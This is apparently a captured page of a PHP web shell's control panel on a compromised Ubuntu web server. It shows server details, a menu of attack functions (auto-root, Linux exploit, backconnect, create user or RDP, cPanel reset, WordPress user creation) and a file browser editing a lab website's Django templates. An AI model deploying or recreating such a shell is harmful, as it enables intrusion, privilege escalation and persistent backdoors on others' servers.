Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vicas-dev /
blog /
templates /
blog /
[ HOME SHELL ]
Name
Size
Permission
Action
Navbar.html
1.37
KB
-rw-r--r--
addblog.html
1.95
KB
-rw-r--r--
blog_details.html
1.74
KB
-rw-r--r--
blog_list.html
1.91
KB
-rw-r--r--
blogprofile.html
0
B
-rw-r--r--
student_list.html
852
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Navbar.html
<div class="bg-white"> <div class="px-5 flex justify-between items-center max-w-[1300px] mx-auto"> <div> <img class="h-20" src="\static\assets\v-icon.png" /> </div> <ul class="flex space-x-6"> <li><a href="/">Home</a></li> <li> <div class="relative group"> <button class="group-hover:bg-gray-200 cursor-pointer">Members</button> <ul class="absolute hidden z-10 group-hover:block bg-white shadow-lg p-2 space-y-2"> <li class="p-2"> <a href="/phd">P.hd</a> </li> <li class="p-2"> <a href="/mtech">M.Tech</a> </li> <li class="p-2"> <a href="/btech">B.Tech</a> </li> </ul> </div> </li> <li> <a href="/research">Research</a> </li> <!-- <li> <a href="/blogs">Blogs</a> </li> --> <li> <a href="/contact">Contact Us</a> </li> <li> <a href="/gallery">Gallery</a> </li> <li> <a href="{% url 'blog_list' %}">Blog</a> </li> </ul> <div><img class="h-20 w-[350px] object-cover" src="/static/assets/iiitd_logo.png" /></div> </div> </div>
Close